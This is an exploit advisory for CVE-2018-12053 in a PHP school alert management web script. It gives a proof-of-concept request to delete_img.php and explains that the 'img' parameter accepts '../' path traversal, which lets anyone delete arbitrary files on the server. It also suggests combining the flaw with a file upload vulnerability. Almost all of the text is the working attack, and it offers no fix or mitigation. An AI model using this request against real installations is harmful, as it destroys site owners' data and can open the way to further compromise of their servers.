# Exploit Title: Schools Alert Management Script - Arbitrary File Deletion# Date: 2018-06-07# Vendor Homepage: https://www.phpscriptsmall.com/# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/# Category: Web Application# Exploit Author: M3@Pandas# Web: https://github.com/unh3x/just4cve/issues/6# Tested on: Linux Mint# CVE: CVE-2018-12053# Proof of Concept:/delete_img.php?img=./uploads/school_logos/1528_x1.php
# notice: There is a risk of file deletion,you'd better test it combined with file upload vulnerability.# Attackers can delete any file through parameter 'img' with '../' .